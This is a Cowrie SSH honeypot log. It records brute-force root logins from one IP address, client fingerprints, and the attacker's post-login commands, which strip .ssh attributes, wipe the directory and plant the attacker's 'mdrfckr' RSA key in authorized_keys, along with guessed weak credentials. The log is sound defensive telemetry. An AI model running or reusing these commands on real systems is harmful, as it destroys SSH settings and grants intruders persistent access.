{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49856,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a88d4718090","protocol":"ssh","message":"New connection: 212.227.235.229:49856 (1.2.3.4:22) [session: 4a88d4718090]","sensor":"my-vps","timestamp":"2025-09-09T06:00:57.601052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:00:57.601941Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:00:57.780774Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:00:58.597944Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:00:59.327238Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:00:59.328107Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:00:59.329558Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:00:59.509488Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:00:59.973965Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:00:59.974929Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.155995Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.156962Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51378,"dst_ip":"1.2.3.4","dst_port":22,"session":"0682a00e7053","protocol":"ssh","message":"New connection: 212.227.235.229:51378 (1.2.3.4:22) [session: 0682a00e7053]","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.328147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.328827Z","src_ip":"212.227.235.229","session":"0682a00e7053"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.503246Z","src_ip":"212.227.235.229","session":"0682a00e7053"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3303,"dst_ip":"1.2.3.4","dst_port":22,"session":"88bde03b3e59","protocol":"ssh","message":"New connection: 212.227.235.229:3303 (1.2.3.4:22) [session: 88bde03b3e59]","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.799546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:00.800584Z","src_ip":"212.227.235.229","session":"88bde03b3e59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:01.061175Z","src_ip":"212.227.235.229","session":"88bde03b3e59"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:01.241949Z","src_ip":"212.227.235.229","session":"0682a00e7053"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Abcd@123456","message":"login attempt [ubuntu/Abcd@123456] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:02.148058Z","src_ip":"212.227.235.229","session":"88bde03b3e59"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:02.418410Z","src_ip":"212.227.235.229","session":"0682a00e7053"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52336,"dst_ip":"1.2.3.4","dst_port":22,"session":"093f8a94637d","protocol":"ssh","message":"New connection: 212.227.235.229:52336 (1.2.3.4:22) [session: 093f8a94637d]","sensor":"my-vps","timestamp":"2025-09-09T06:01:02.594226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:02.599436Z","src_ip":"212.227.235.229","session":"093f8a94637d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:02.773293Z","src_ip":"212.227.235.229","session":"093f8a94637d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:01:03.470323Z","src_ip":"212.227.235.229","session":"093f8a94637d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:03.647280Z","src_ip":"212.227.235.229","session":"093f8a94637d"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:03.648390Z","src_ip":"212.227.235.229","session":"4a88d4718090"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":64641,"dst_ip":"1.2.3.4","dst_port":22,"session":"f510cdefe4f7","protocol":"ssh","message":"New connection: 212.227.235.229:64641 (1.2.3.4:22) [session: f510cdefe4f7]","sensor":"my-vps","timestamp":"2025-09-09T06:01:04.245513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:01:04.246272Z","src_ip":"212.227.235.229","session":"f510cdefe4f7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:01:04.377294Z","src_ip":"212.227.235.229","session":"f510cdefe4f7"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:04.955655Z","src_ip":"212.227.235.229","session":"f510cdefe4f7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:06.081915Z","src_ip":"212.227.235.229","session":"f510cdefe4f7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56376,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4daf28248bb","protocol":"ssh","message":"New connection: 217.72.205.35:56376 (1.2.3.4:22) [session: e4daf28248bb]","sensor":"my-vps","timestamp":"2025-09-09T06:01:07.104394Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:07.105549Z","src_ip":"217.72.205.35","session":"e4daf28248bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56088,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fdc97bdcc4c","protocol":"ssh","message":"New connection: 212.227.235.229:56088 (1.2.3.4:22) [session: 1fdc97bdcc4c]","sensor":"my-vps","timestamp":"2025-09-09T06:01:27.959163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:01:27.960785Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:01:28.155451Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.login.success","username":"root","password":"Az.123456","message":"login attempt [root/Az.123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:01:28.945478Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:01:29.337573Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:01:29.338257Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:01:29.339118Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:29.754802Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:01:30.008865Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.009540Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.198779Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.199681Z","src_ip":"212.227.235.229","session":"1fdc97bdcc4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56906,"dst_ip":"1.2.3.4","dst_port":22,"session":"59abcba50a08","protocol":"ssh","message":"New connection: 212.227.235.229:56906 (1.2.3.4:22) [session: 59abcba50a08]","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.365098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.365814Z","src_ip":"212.227.235.229","session":"59abcba50a08"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:01:30.542770Z","src_ip":"212.227.235.229","session":"59abcba50a08"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:01:31.283503Z","src_ip":"212.227.235.229","session":"59abcba50a08"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:01:32.466029Z","src_ip":"212.227.235.229","session":"59abcba50a08"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57590,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab43858387a1","protocol":"ssh","message":"New connection: 212.227.235.229:57590 (1.2.3.4:22) [session: ab43858387a1]","sensor":"my-vps","timestamp":"2025-09-09T06:01:32.626043Z"}
